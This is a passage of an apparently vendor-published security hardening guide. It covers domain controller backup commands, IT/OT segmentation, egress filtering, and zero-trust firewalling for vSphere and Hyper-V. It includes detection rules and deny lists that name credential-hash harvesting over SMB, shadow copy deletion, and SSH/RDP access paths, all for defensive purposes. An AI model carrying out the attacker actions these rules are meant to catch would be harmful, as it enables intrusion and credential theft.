<p><span>Monitor audit logs for new MFA device registrations (AuthenticationMethodRegistered) occurring within 60 minutes of a sign-in from a new IP or device. Attackers who steal session tokens via AiTM immediately register their own MFA device for persistent access.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>OAuth/Consent Phishing</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1550/001/" rel="noopener" target="_blank"><span>T1550.001 - Use Alternate Authentication Material</span></a></p>
</td>
<td>
<p><span>Monitor for OAuth application consent grants with high-privilege scopes (Mail.Read, Files.ReadWrite.All) from unrecognized application IDs.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span>Table 3: Detection opportunities for external-facing assets and MFA attempts</span></p>
</div></div>
<div class="block-paragraph_advanced"><h3><span>2. Critical Asset Protections</span></h3>
<h4><span>Domain Controller and Critical Asset Backups</span></h4>
<p><span>Organizations should verify that backups for domain controllers and critical assets are available and protected against unauthorized access or modification. Backup processes and procedures should be exercised on a continual basis. Backups should be protected and stored within secured enclaves that include both network and identity segmentation. </span></p>
<p><span>If an organization's Active Directory (AD) were to become corrupted or unavailable due to ransomware or a potentially destructive attack, restoring Active Directory from domain controller backups may be the only viable option to reconstitute domain services. The following domain controller recovery and reconstitution best practices should be proactively reviewed by organizations: </span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Verify that there is a known good backup of domain controllers and </span><code>SYSVOL</code><span> shares (e.g., from a domain controller – backup </span><code>C:\Windows\SYSVOL</code><span>).</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span><span>For domain controllers, a system state backup is preferred.</span> <br><br></span><strong>Note:</strong><span> </span><span>For a system state backup to occur, </span><span>Windows Server Backup</span><span> must be installed as a feature on a domain controller. </span></p>
</li>
<li aria-level="1">
<p role="presentation">The following command can be run from an elevated command prompt to initiate a system state backup of a domain controller.</p>
</li>
</ul>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>wbadmin start systemstatebackup -backuptarget:&lt;targetDrive&gt;:</code></pre>
<p><span>Figure 1: Command to perform a system state backup</span></p></div>
<div class="block-paragraph_advanced"><ul>
<li>
<ul>
<li><span>The following command can be run from an elevated command prompt to perform a </span><code>SYSVOL</code><span> backup. (</span><span>Manage auditing and security log</span><span> permissions must also be configured for the account performing the backup.)</span></li>
</ul>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>robocopy c:\windows\sysvol c:\sysvol-backup /copyall /mir /b /r:0 /xd</code></pre>
<p><span>Figure 2: Command to perform a SYSVOL backup</span></p></div>
<div class="block-paragraph_advanced"><ul>
<li aria-level="1">
<p role="presentation"><span>Proactively identify domain controllers that hold flexible single master operation (FSMO) roles, as these domain controllers will need to be prioritized for recovery in the event that a full domain restoration is required. </span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>netdom query fsmo</code></pre>
<p><span>Figure 3: Command to identify domain controllers that hold FSMO roles</span></p></div>
<div class="block-paragraph_advanced"><ul>
<li aria-level="1">
<p role="presentation"><span>Offline backups: Ensure offline domain controller backups are secured and stored separately from online backups. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Encryption: Backup data should be encrypted both during transit (over the wire) and when at rest or mirrored for offsite storage. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>DSRM Password validation: Ensure that the Directory Services Restore Mode (DSRM) password is set to a known value for each domain controller. This password is required when performing an authoritative or nonauthoritative domain controller restoration. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Configure alerting for backup operations: Backup products and technologies should be configured to detect and provide alerting for operations critical to the availability and integrity of backup data (e.g., deletion of backup data, purging of backup metadata, restoration events, media errors). </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Enforce role-based access control (RBAC): Access to backup media and the applications that govern and manage data backups should use RBAC to restrict the scope of accounts that have access to the stored data and configuration parameters. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Testing and verification: Both authoritative and nonauthoritative domain controller restoration processes should be documented and tested on a regular basis. The same testing and verification processes should be enforced for critical assets and data.</span></p>
</li>
</ul>
<h4><span>Business Continuity Planning</span></h4>
<p><span>Critical asset recovery is dependent upon in-depth planning and preparation, which is often included within an organization's business continuity plan (BCP). Planning and recovery preparation should include the following core competencies:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>A well-defined understanding of crown jewels data and supporting applications that align to backup, failover, and restoration tasks that prioritize mission-critical business operations</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Clearly defined asset prioritization and recovery sequencing</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Thoroughly documented recovery processes for critical systems and data</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Trained personnel to support recovery efforts</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Validation of recovery processes to ensure successful execution</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Clear delineation of responsibility for managing and verifying data and application backups</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Online and offline data backup retention policies, including initiation, frequency, verification, and testing (for both on-premises and cloud-based data)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Established service-level agreements (SLAs) with vendors to prioritize application and infrastructure-focused support</span></p>
</li>
</ul>
<p><span>Continuity and recovery planning can become stale over time, and processes are often not updated to reflect environment and personnel changes. Prioritizing evaluations, continuous training, and recovery validation exercises will enable an organization to be better prepared in the event of a disaster.</span></p>
<h4><span>Detection Opportunities for Backups</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div> </div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Volume Shadow Deletion</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1490/" rel="noopener" target="_blank"><span>T1490 – Inhibit System Recovery</span></a></p>
</td>
<td>
<p><span>Search for instances where a threat actor will delete volume shadow copies to inhibit system recovery. This can be accomplished using the command line, PowerShell, and other utilities.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Unauthorized Access Attempt</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span>T1078 – Valid Accounts</span></a></p>
</td>
<td>
<p><span>Search for unauthorized users attempting to access the media and applications that are used to manage data backups.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Suspicious Usage of the DSRM Password</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span>T1078 – Valid Accounts</span></a></p>
</td>
<td>
<p><span>Monitor security event logs on domain controllers for:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Event ID 4794 - An attempt was made to set the Directory Services Restore Mode administrator password</span></p>
</li>
</ul>
<p><span>Monitoring the following registry key on domain controllers:<br><br></span></p>
<pre class="language-plain"><code>HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdminLogonBehavior</code></pre>
<p><span>Figure 4: DSRM registry key for monitoring</span></p>
<p><span>The possible values for the registry key noted in Figure 4 are:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><code>0</code><span> (default): The DSRM Administrator account can only be used if the domain controller is restarted in Directory Services Restore Mode.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><code>1</code><span>: The DSRM Administrator account can be used for a console-based log on if the local </span><span>Active Directory Domain Services</span><span> service is stopped.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><code>2</code><span>: The DSRM Administrator account can be used for console or network access without needing to reboot a domain controller.</span></p>
</li>
</ul>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div><span>Table <span>4: Detection opportunities for backups</span></span></div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>IT and OT Segmentation</span></h4>
<p><span>Organizations should ensure that there is both physical and logical segmentation between corporate information technology (IT) domains, identities, networks, and assets and those used in direct support of operational technology (OT) processes and control. By enforcing IT and OT segmentation, organizations can inhibit a threat actor's ability to pivot from corporate environments to mission-critical OT assets using compromised accounts and existing network access paths. </span></p>
<p><span>OT environments should leverage separate identity stores (e.g., dedicated Active Directory domains), which are not trusted or cross-used in support of corporate identity and authentication. </span><strong>The compromise of a corporate identity or asset should not result in a threat actor's ability to directly pivot to accessing an asset that has the ability to influence an OT process.</strong></p>
<p><span>In addition to separate AD forests being leveraged for IT and OT, segmentation should also include technologies that may have a dual use in the IT and OT environments (backup servers, antivirus [AV], endpoint detection and response [EDR], jump servers, storage, virtual network infrastructure). OT segmentation should be designed such that if there is a disruption in the corporate (IT) environment, the OT process can safely function independently, without a direct dependency (account, asset, network pathway) with the corporate infrastructure. For any dependencies that cannot be readily segmented, organizations should identify potential short-term processes or manual controls to ensure that the OT environment can be effectively isolated if evidence of an IT (corporate)-focused incident were detected. </span></p>
<p><span>Segmenting IT and OT environments is a best practice recommended by industry standards such as the National Institute of Standards and Technology (NIST) <em>SP 800-82r3</em></span><span>: <a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r3.pdf" rel="noopener" target="_blank">Guide to Operational Technology (OT) Security</a></span><span> and </span><a href="https://www.isa.org/intech-home/2018/september-october/departments/new-standard-specifies-security-capabilities-for-c" rel="noopener" target="_blank"><span>IEC 62443</span></a><span> (formerly ISA99).</span></p>
<p><span>According to these best-practice standards, segmenting IT and OT networks should include the following:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>OT attack surface reduction by restricting the scope of ports, services, and protocols that are directly accessible within the OT network from the corporate (IT) network.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Incoming access from corporate (IT) into OT must terminate within a segmented OT demilitarized zone (DMZ). The OT DMZ must require that a separate level of authentication and access be granted (outside of leveraging an account or endpoint that resides within the corporate IT domain). </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Explicit firewall rules should restrict both incoming traffic from the corporate environment and outgoing traffic from the OT environment.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Firewalls should be configured using the principle of deny by default, with only approved and authorized traffic flows permitted. Egress (internet) traffic flows for all assets that support OT should also follow the deny-by-default model.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Identity (account) segmentation must be enforced between corporate IT and OT. An account or endpoint within either environment should not have any permissions or access rights assigned outside of the respective environment. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Remote access to the OT environment should not leverage similar accounts that have remote access permissions assigned within the corporate IT environment. </span><strong>MFA using separate credentials should be enforced for remotely accessing OT assets and resources.</strong></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Training and verification of manual control processes, including isolation and reliability verification for safety systems.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Secured enclaves for storing backups, programming logic, and logistical diagrams for systems and devices that comprise the OT infrastructure.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>The default usernames and passwords associated with OT devices should always be changed from the default vendor configuration(s). </span></p>
</li>
</ul>
<h4><span>Detection Opportunities for IT and OT Segmented Environments</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Network Service Scanning</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1046/" rel="noopener" target="_blank"><span>T1046 – Network Service Scanning</span></a></p>
</td>
<td>
<p><span>Search for instances where a threat actor is performing internal network discovery to identify open ports and services between segmented environments.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Unauthorized Authentication Attempts Between Segmented Environments</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span>T1078 – Valid Accounts</span></a></p>
</td>
<td>
<p><span>Search for failed logins for accounts limited to one environment attempting to log in within another environment. This can detect threat actors attempting to reuse credentials for lateral movement between networks.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 5: Detection opportunities for IT and OT segmented environments</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Egress Restrictions</span></h4>
<p><span>Servers and assets that are infrequently rebooted are highly targeted by threat actors for establishing backdoors to create persistent beacons to command-and-control (C2) infrastructure. By blocking or severely limiting internet access for these types of assets, an organization can effectively reduce the risk of a threat actor compromising servers, extracting data, or installing backdoors that leverage egress communications for maintaining access.</span></p>
<p><span>Egress restrictions should be enforced so that servers, internal network devices, critical IT assets, OT assets, and field devices cannot attempt to communicate to external sites and addresses (internet resources). The concept of deny by default should apply to all servers, network devices, and critical assets (including both IT and OT), with only allow-listed and authorized egress traffic flows explicitly defined and enforced. Where possible, this should include blocking recursive Domain Name System (DNS) resolutions not included in an allow-list to prevent communication via DNS tunneling.</span></p>
<p><span>If possible, egress traffic should be routed through an inspection layer (such as a proxy) to monitor external connections and block any connections to malicious domains or IP addresses. Connections to uncategorized network locations (e.g., a domain that has been recently registered) should not be permitted. Ideally, DNS requests would be routed through an external service (e.g., Cisco Umbrella, Infoblox DDI) to monitor for lookups to malicious domains. </span></p>
<p><span>Threat actors often attempt to harvest credentials (including New Technology Local Area Network [LAN] Manager [NTLM] hashes) based upon outbound Server Message Block (SMB) or Web-based Distributed Authoring and Versioning (WebDAV) communications. Organizations should review and limit the scope of egress protocols that are permissible from </span><strong>any</strong><span> endpoint within the environment. While Hypertext Transfer Protocol (HTTP) (Transmission Control Protocol (TCP)/80) and HTTP Secure (HTTPS) (TCP/443) egress communications are likely required for many user-based endpoints, the scope of external sites and addresses can potentially be limited based upon web traffic-filtering technologies. Ideally, organizations should only permit egress protocols and communications based upon a predefined allow-list. Common high-risk ports for egress restrictions include:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>File Transfer Protocol (FTP)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Remote Desktop Protocol (RDP)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Secure Shell (SSH)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Server Message Block (SMB)</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Trivial File Transfer Protocol (TFTP) </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>WebDAV</span></p>
</li>
</ul>
<h4><span>Detection Opportunities for Suspicious Egress Traffic Flows</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>External Connection Attempt to a Known Malicious IP</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/tactics/TA0011/" rel="noopener" target="_blank"><span>TA0011 – Command and Control</span></a></p>
</td>
<td>
<p><span>Leverage threat feeds to identify attempted connections to known bad IP addresses.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>External Communications from Servers, Critical Assets, and Isolated Network Segments</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/tactics/TA0011/" rel="noopener" target="_blank"><span>TA0011 – Command and Control</span></a></p>
</td>
<td>
<p><span>Search for egress traffic flows from subnets and addresses that correlate to servers, critical assets, OT segments, and field devices.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Outbound Connections Attempted Over SMB</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1212/" rel="noopener" target="_blank"><span>T1212 – Exploitation for Credential Access</span></a></p>
</td>
<td>
<p><span>Search for external connection attempts over SMB, as this may be an attempt to harvest credential hashes.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 6: Detection opportunities for suspicious egress traffic flows</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Virtualization Infrastructure Protections</span><strong> </strong></h4>
<p><span>Threat actors often target virtualization infrastructure (e.g., VMware vSphere, Microsoft Hyper-V) as part of their reconnaissance, lateral movement, data theft, and potential ransomware deployment objectives. Securing virtualization infrastructure requires a Zero Trust network posture as a primary defense. Because management appliances often lack native MFA for local privileged accounts, identity-based security alone can be a high-risk single point of failure. If credentials are compromised, the logical network architecture becomes the final line of defense protecting the virtualization management plane.</span></p>
<p><span>To reduce the attack surface of virtualized infrastructure, a best practice for VMware vSphere vCenter ESXi and Hyper-V appliances and servers is to isolate and restrict access to the management interfaces, essentially enclaving these interfaces within isolated virtual local area networks (VLANs) (network segments) where connectivity is only permissible from dedicated subnets where administrative actions can be initiated.</span></p>
<p><span>To protect the virtualization control plane, organizations must consider a "defense-in-depth" network model. This architecture integrates physical isolation and east-west micro-segmentation to remove all access paths from untrusted networks. The result is a management zone that remains isolated and resilient, even during an active intrusion.</span></p>
<h5><span>VMware vSphere Zero-Trust Network Architecture</span><span> </span></h5>
<p><span>The primary goal is to ensure that even if privileged credentials are compromised, the logical network remains the definitive defensive layer preventing access to virtualization management interfaces.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Immutable VLAN Segmentation</strong><span>: Enforce strict isolation using distinct 802.1Q VLAN IDs for host management, Infrastructure/VCSA, vMotion (non-routable), Storage (non-routable), and production Guest VMs.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Virtual Routing and Forwarding (VRF)</strong><span>: Transition all infrastructure VLANs into a dedicated VRF instance. This ensures that even a total compromise of the "User" or "Guest" zones results in no available route to the management zone(s).</span></p>
</li>
</ul>
<h6><span>Layer 3 and 4 Access Policies</span></h6>
<p><span>The management network must be accessible only from trusted, hardened sources.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>PAW-Exclusive Access:</strong><span> Deconstruct all direct routes from the general corporate LAN to management subnets. Access must originate strictly from a designated Privileged Access Workstation (PAW) subnet.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Ingress Filtering (Management Zone)</strong><span>:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>ALLOW:</strong><span> TCP/443 (UI/API) and TCP/902 (MKS) from the PAW subnet only.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>DENY</strong><span>: Explicitly block SSH (TCP/22) and VAMI (TCP/5480) from all sources </span><span>except</span><span> the PAW subnet.</span></p>
</li>
</ul>
</li>
<li aria-level="1">
<p role="presentation"><strong>Restrictive Egress Policy:</strong><span> Enforce outbound filtering at the hardware gateway (as the VCSA GUI cannot manage egress). To prevent persistence using C2 traffic and data exfiltration, block all internet access except to specific, verified update servers (e.g., VMware Update Manager) and authorized identity providers.</span></p>
</li>
</ul>
<h6><span>Host-Based Firewall Enforcement</span></h6>
<p><span>Complement network firewalls with host-level filtering to eliminate visibility gaps within the same VLAN.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>VCSA (Photon OS)</strong><span>: Transition the default policy to "Default Deny" via the VAMI or, preferably, at the OS level using iptables/nftables for granular source/destination mapping. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>ESXi Hypervisors: </strong><span>Restrict all services (SSH, Web Access, NFC/Storage) to specific management IPs by deselecting "Allow connections from any IP address."</span></p>
</li>
</ul>
<p><span>Additional information related to <a href="https://knowledge.broadcom.com/external/article/377036/how-to-block-all-traffic-on-vcenter-exce.htm" rel="noopener" target="_blank">VMware vSphere VCSA host based firewalls</a>.</span></p>
<p><span>A <a href="https://kb.vmware.com/s/article/1012382" rel="noopener" target="_blank">listing of administrative ports</a> associated with VMWare vCenter (that should be targeted for isolation).</span></p>
<h5><span>Hyper-V Zero-Trust Network Architecture </span></h5>
<p><span>Similar to vSphere, Hyper-V requires strict isolation of its various traffic types to prevent lateral movement from guest workloads to the management plane.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>VLAN Segmentation:</strong><span> Organizations must enforce isolation using distinct VLANs for Host Management, Live Migration, Cluster Heartbeat (CSV), and Production Guest VMs.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Non-Routable Networks:</strong><span> Traffic for Live Migration and Cluster Shared Volumes (CSV) should be placed on non-routable VLANs to ensure these high-bandwidth, sensitive streams cannot be intercepted from other segments.</span></p>
</li>
</ul>
<h6><span>Layer 3 and 4 Access Policies</span></h6>
<p><span>The management network must be accessible only from trusted, hardened sources.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>PAW-Exclusive Access:</strong><span> Deconstruct all direct routes from the general corporate LAN to management subnets. Access must originate strictly from a designated Privileged Access Workstation (PAW) subnet.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Ingress Filtering (Management Zone)</strong><span>:</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><strong>ALLOW</strong><span>: WinRM / PowerShell Remoting (TCP/5985 and TCP/5986), RDP (TCP/3389), and WMI/RPC (TCP/135 and dynamic RPC ports)strictly from the PAW subnet. If using Windows Admin Center, allow HTTPS (TCP/443) to the gateway.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><strong>DENY</strong><span>: Explicitly block SMB (TCP/445), RPC/WMI (TCP/135), and all other management traffic from untrusted sources to prevent credential theft and lateral movement.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><strong>Restrictive Egress Policy: </strong><span>Enforce outbound filtering at the network gateway. To prevent persistence using C2 traffic and data exfiltration, block all internet access from Hyper-V hosts except to specific, verified update servers (e.g., internal WSUS), authorized Active Directory Domain Controllers, and Key Management Servers (KMS).</span></p>
</li>
</ul>
<h6><span>Host-Based Firewall Enforcement</span></h6>
<p><span>Use the Windows Firewall with Advanced Security (WFAS) to achieve a defense-in-depth posture at the host level.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Scope Restriction: </strong><span>For all enabled management rules (e.g., File and Printer Sharing, WMI, PowerShell Remoting), modify the Remote IP Address scope to "These IP addresses" and enter only the PAW and management server subnets.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Management Logging: </strong><span>Enable logging for Dropped Packets in the Windows Firewall profile. This allows the SIEM to ingest "denied" connection attempts, which serve as high-fidelity indicators of internal reconnaissance or unauthorized access attempts.</span></p>
</li>
</ul>
<p><span>Additional information related to <a href="https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj721516(v=ws.11)" rel="noopener" target="_blank">Hyper-V host based firewalls</a>.</span></p>
<p><span>Additional information related to <a href="https://learn.microsoft.com/en-us/windows-server/virtualization/hyper-v/plan/plan-hyper-v-security-in-windows-server" rel="noopener" target="_blank">securing Hyper-V</a>.</span><span> </span></p>
<h5><span>General Virtualization Hardening </span></h5>
<p><span>To protect management interfaces for VMware vSphere the VMKernel network interface card (NIC) should </span><strong>not</strong><span> be bound to the same virtual network assigned to virtual machines running on the host. Additionally, ESXi servers can be configured in lockdown mode, which will only allow console access from the vCenter server(s). Additional information related to <a href="https://kb.vmware.com/s/article/1008077" rel="noopener" target="_blank">lockdown mode</a></span><span>.</span></p>
<p><span>The SSH protocol (TCP/22) provides a common channel for accessing a physical virtualization server or appliance (vCenter) for administration and troubleshooting. Threat actors commonly leverage SSH for direct access to virtualization infrastructure to conduct destructive attacks. In addition to enclaving access to administrative interfaces, SSH access to virtualization infrastructure should be disabled and only enabled for specific use-cases. If SSH is required, network ACLs should be used to limit where connections can originate.</span></p>
<p><span>Identity segmentation should also be configured when accessing administrative interfaces associated with virtualization infrastructure. If Active Directory authentication provides direct integrated access to the physical virtualization stack, a threat actor that has compromised a valid Active Directory account (with permissions to manage the virtualization infrastructure) could potentially use the account to directly access virtualized systems to steal data or perform destructive actions.</span></p>
<p><span>Authentication to virtualized infrastructure should rely upon dedicated and unique accounts that are configured with strong passwords and that are </span><strong>not</strong><span> co-used for additional access within an environment. Additionally, accessing management interfaces associated with virtualization infrastructure should only be initiated from isolated privileged access workstations, which prevent the storing and caching of passwords used for accessing critical infrastructure components.</span></p>
<h5><span>Protecting Hypervisors Against Offline Credential Theft and Exfiltration</span></h5>
